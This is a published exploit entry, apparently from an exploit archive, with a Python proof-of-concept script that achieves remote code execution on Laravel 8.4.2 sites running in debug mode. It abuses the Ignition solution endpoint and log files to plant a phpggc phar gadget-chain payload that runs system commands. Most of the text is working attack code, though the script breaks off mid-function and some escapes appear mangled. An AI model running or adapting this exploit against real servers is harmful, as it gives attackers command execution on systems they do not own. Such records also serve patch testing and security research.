Authored by SunCSR Team

Laravel version 8.4.2 suffers from a debug mode remote code execution vulnerability.

# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution
# Date: 1.14.2021
# Exploit Author: SunCSR Team
# Vendor Homepage: https://laravel.com/
# References:
# https://www.ambionics.io/blog/laravel-debug-rce
# https://viblo.asia/p/6J3ZgN8PKmB
# Version: <= 8.4.2
# Tested on: Ubuntu 18.04 + nginx + php 7.4.3
# Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce


#!/usr/bin/env python3

import requests, sys, re, os

header={
"Accept": "application/json"
}

data = {
"solution":"FacadeIgnitionSolutionsMakeViewVariableOptionalSolution",
"parameters":{
"variableName":"cm0s",
"viewFile":""
}
}

def clear_log(url='', viewFile=''):

global data

data['parameters']['viewFile'] = viewFile
while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200): pass
requests.post(url=url, json=data, headers=header, verify=False)
requests.post(url=url, json=data, headers=header, verify=False)

def create_payload(url='', viewFile=''):

global data

data['parameters']['viewFile'] = viewFile
resp = requests.post(url=url, json=data, headers=header, verify=False)
if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text:
return True
return False

def convert(url='', viewFile=''):

global data

data['parameters']['viewFile'] = viewFile
resp = requests.post(url=url, json=data, headers=header, verify=False)
if resp.status_code == 200:
return True
return False

def exploited(url='', viewFile=''):

global data

data['parameters']['viewFile'] = viewFile
resp = requests.post(url=url, json=data, headers=header, verify=False)
if resp.status_code == 500 and 'cannot be empty' in resp.text:
m = re.findall(r'{(.|n)+}((.|n)*)', resp.text)
print()
print(m[0][1])

def generate_payload(command='', padding=0):
if '/' in command:
command = command.replace('/', '/')
command = command.replace(''', ''')
os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./